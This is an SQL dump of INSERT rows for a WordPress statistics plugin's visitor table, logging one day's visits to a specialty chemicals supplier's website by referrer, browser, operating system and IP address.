INSERT INTO `wp_statistics_visitor` VALUES (3503, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3504, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3505, '2016-10-13', 'https://www.miller-stephenson.com/news/', 'MSIE', 'Windows', '9.0', '', '182.118.25.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3506, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '113.193.144.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3507, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '108.185.181.71', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3508, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '222.72.133.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3509, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '120.76.163.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3510, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '120.77.11.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3511, '2016-10-13', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3512, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3513, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3514, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3515, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3516, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '67.149.155.37', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3517, '2016-10-13', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '32.218.124.241', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3518, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '210.172.6.128', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3519, '2016-10-13', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '27.254.240.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3520, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '76.115.42.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3521, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.121.210.87', '000', 251, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3522, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.53.243.48', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3523, '2016-10-13', 'https://www.baidu.com/link?url=bnm3ISPLaIBl3ZKt7eM9umzFGB8hvH7pFNQ2qnw7pB5EcQQ7dNvVx0obcc_U_CbC&wd=&eqid=a1243756000514230000000357feff68', 'Chrome', 'Windows', '50.0.2661.102', '', '222.44.247.100', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3524, '2016-10-13', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.116', '', '199.168.97.29', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3525, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.65.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3526, '2016-10-13', 'https://alarmobninsk.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.155.22', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3527, '2016-10-13', 'https://m.facebook.com/', 'Chrome', 'Android', '30.0.0.0', '', '75.53.100.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3528, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '70.112.202.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3529, '2016-10-13', 'https://m.facebook.com', 'AppleWebKit', 'iPhone', '602.1.50', '', '73.162.191.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3530, '2016-10-13', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0ahUKEwj3lO2D99bPAhUMQ48KHV8iAt04HhAWCB4wAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&sig2=1E7GdSS1c10iyom59d9zUA', 'MSIE', 'Windows', '11.0', '', '203.141.91.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3531, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3532, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3533, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3534, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2062.124', '', '54.82.66.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3535, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3536, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '43.0.2357.81', '', '213.189.136.90', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3537, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.27.128.173', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3538, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '5.0', '', '41.82.61.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3539, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '122.10.94.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3540, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.1', '', '78.36.25.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3541, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '104.34.127.4', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3542, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '104.34.127.4', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3543, '2016-10-13', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.246', '', '131.253.38.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3544, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.217.77.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3545, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3546, '2016-10-13', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.115.139.174', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3547, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDMQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=6x7_V8m-ELaI8AXxOA&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'Safari', 'iPhone', '9.0', '', '66.249.88.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3548, '2016-10-13', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'Safari', 'iPhone', '9.0', '', '66.249.88.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3549, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '192.3.128.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3550, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '58.62.19.30', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3551, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '28.0', '', '185.117.73.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3552, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwinsaDSi9fPAhUDeCYKHfpmCo0QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '65.170.41.5', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3553, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.184.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3554, '2016-10-13', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3555, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.17.16', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3556, '2016-10-13', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '43.0', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3557, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '166.63.127.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3558, '2016-10-13', 'https://www.google.co.in/', 'Firefox', 'Windows', '49.0', '', '115.119.115.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3559, '2016-10-13', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Firefox', 'Windows', '49.0', '', '115.115.183.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3560, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3561, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3562, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '172.113.246.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3563, '2016-10-13', 'https://www.google.co.in/', 'Chrome', 'Windows', '26.0.1410.64', '', '203.175.7.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3564, '2016-10-13', 'https://www.google.com.my/', 'Firefox', 'Windows', '49.0', '', '121.122.26.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3565, '2016-10-13', 'https://www.google.com.sg/', 'Chrome', 'Windows', '51.0.2704.106', '', '202.79.209.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3566, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.17.160', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3567, '2016-10-13', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '44.0.2403.125', '', '62.212.73.49', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3568, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.6.8', '', '107.20.220.83', '000', 46, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3569, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.187.250.83', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3570, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.89.57.226', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3571, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.70.176.91', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3572, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.39.95.243', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3573, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '112.16.0.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3574, '2016-10-13', 'https://shinikiev.com.ua/', 'Opera', 'Windows', '7.11', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3575, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.70.180.63', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3576, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.68.166.147', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3577, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3578, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.32.93.164', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3579, '2016-10-13', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3580, '2016-10-13', 'https://www.miller-stephenson.com', 'YisouSpider', 'Unknown', 'Unknown', '', '42.156.139.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3581, '2016-10-13', 'https://www.miller-stephenson.com/epoxy-and-coatings/', 'MSIE', 'Windows', '9.0', '', '182.118.20.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3582, '2016-10-13', 'https://www.google.it/', 'Chrome', 'Windows', '53.0.2785.143', '', '151.91.34.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3583, '2016-10-13', 'https://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwjvz4f0qtfPAhVFPxQKHddhCW0QFghTMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvertrel-xf%2F&usg=AFQjCNEl4Khv43gCC1E7OHeZFgsSOCVStQ&bvm=bv.135475266,d.bGg', 'MSIE', 'Windows', '11.0', '', '178.119.111.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3584, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.13.234', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3585, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '42.0.2311.154', '', '210.75.252.214', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3586, '2016-10-13', 'https://www.google.ru/', 'Chrome', 'Windows', '46.0.2490.71', '', '184.168.224.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3587, '2016-10-13', 'https://www.miller-stephenson.com/product/krytox-240ac/', 'Chrome', 'Windows', '46.0.2490.71', '', '184.168.224.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3588, '2016-10-13', 'https://www.google.gr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwjeqInIrNfPAhULXBoKHcR6C4QQFghJMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-204%2F&usg=AFQjCNGNuVKFTf4-eHhIs11Hp1AgQkKSjg&sig2=FEKEU1NoySBbB2dbtsFHjw&bvm=bv.135475266,d.d2s', 'MSIE', 'Windows', '11.0', '', '62.103.30.184', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3589, '2016-10-13', 'https://eriknem.com/joomla_leto/coating', 'Chrome', 'Windows', '47.5.2526.111', '', '184.168.224.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3590, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '193.54.90.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3591, '2016-10-13', 'https://www.google.co.il/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.218.137.154', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3592, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3593, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3594, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '209.95.182.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3595, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.18.126', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3596, '2016-10-13', 'https://www.google.ch/', 'Firefox', 'Windows', '49.0', '', '81.63.162.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3597, '2016-10-13', 'https://www.google.co.kr/url?url=https://www.miller-stephenson.com/miller/pdf/MS-900.pdf&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjpqJOutdfPAhUnr1QKHeWyBbQQFggTMAA&usg=AFQjCNF1MVSebQIC0K2J5BRR473A-336iA', 'MSIE', 'Windows', '9.0', '', '121.141.176.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3598, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.70.245.108', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3599, '2016-10-13', 'https://www.google.no/', 'Firefox', 'Windows', '49.0', '', '62.92.33.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3600, '2016-10-13', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '109.226.21.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3601, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3602, '2016-10-13', 'https://www.miller-stephenson.com/krytox-xht-takes-heat/', 'Chrome', 'Windows', '53.0.2785.116', '', '77.86.53.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3603, '2016-10-13', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '92.27.209.128', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3604, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.27.31.216', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3605, '2016-10-13', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '104.223.17.50', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3606, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '104.223.17.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3607, '2016-10-13', 'https://www.google.pl/', 'Firefox', 'Windows', '49.0', '', '91.206.210.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3608, '2016-10-13', 'https://www.google.de/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '88.79.164.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3609, '2016-10-13', 'https://www.google.de', 'Firefox', 'Windows', '43.0', '', '134.94.80.80', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3610, '2016-10-13', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3611, '2016-10-13', 'https://www.miller-stephenson.com/mil-prf-27617-greases/', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3612, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.71.196.240', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3613, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3614, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '180.111.85.151', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3615, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwi1xJbDyNfPAhWqxlQKHQOYD18QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.cGw', 'MSIE', 'Windows', '11.0', '', '10.173.48.41', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3616, '2016-10-13', 'https://www.bing.com/', 'Edge', 'Windows', '13.10586', '', '81.137.216.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3617, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.41.21.9', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3618, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '29.0.1547.0', '', '122.10.94.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3619, '2016-10-13', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '117.247.177.180', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3620, '2016-10-13', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.119.115.234', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3621, '2016-10-13', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '117.247.177.169', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3622, '2016-10-13', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.115.183.198', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3623, '2016-10-13', 'https://www.google.co.in/', 'Firefox', 'Windows', '48.0', '', '117.248.108.56', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3624, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3625, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.172.102', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3626, '2016-10-13', 'https://www.google.pl/', 'Firefox', 'Windows', '49.0', '', '78.10.67.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3627, '2016-10-13', 'https://www.miller-stephenson.com/product/krytox-gpl-226/', 'Firefox', 'Windows', '49.0', '', '188.146.42.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3628, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.1.2.125', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3629, '2016-10-13', 'https://www.google.se/', 'Chrome', 'Windows', '53.0.2785.143', '', '91.223.92.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3630, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '78.10.67.53', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3631, '2016-10-13', 'https://www.miller-stephenson.com/product/krytox-gpl-226/', 'Chrome', 'Windows', '49.0.2623.112', '', '188.146.42.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3632, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.148.227.231', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3633, '2016-10-13', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiI8OLpz9fPAhVE1RoKHcaRDHQQFgg5MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2F157-fsl%2F&usg=AFQjCNGbgfl9cHc-ETJizWt_DmpR6ieaUA&sig2=XKc64WhZKadSMdxMkXKU-w', 'MSIE', 'Windows', '11.0', '', '155.250.255.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3634, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjChoGr0dfPAhWTOoEKHUmYDkwYABAF&sig=AOD64_0MqE8OPeqYA7d10d37AAq0aDqRdg&rct=j&q=&ved=0ahUKEwieh_6q0dfPAhVBHD4KHU4jDDIQ0QwIZw&adurl=', 'MSIE', 'Windows', '11.0', '', '73.10.95.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3635, '2016-10-13', 'https://www.miller-stephenson.com/product/epon-58034/', 'Safari', 'iPhone', '7.0', '', '199.30.24.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3636, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.149.53.5', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3637, '2016-10-13', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '96.81.66.225', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3638, '2016-10-13', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '80.69.195.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3639, '2016-10-13', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 1026, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3640, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '32.0.1700.72', '', '184.168.130.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3641, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '32.0.1700.72', '', '184.168.130.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3642, '2016-10-13', 'https://www.miller-stephenson.com/wp-admin', 'Chrome', 'Windows', '32.0.1700.19', '', '50.62.160.236', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3643, '2016-10-13', 'https://www.miller-stephenson.com/wp-admin', 'Chrome', 'Windows', '32.0.1700.19', '', '184.168.224.113', '000', 76, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3644, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.112.130.253', '000', 4, 0); 
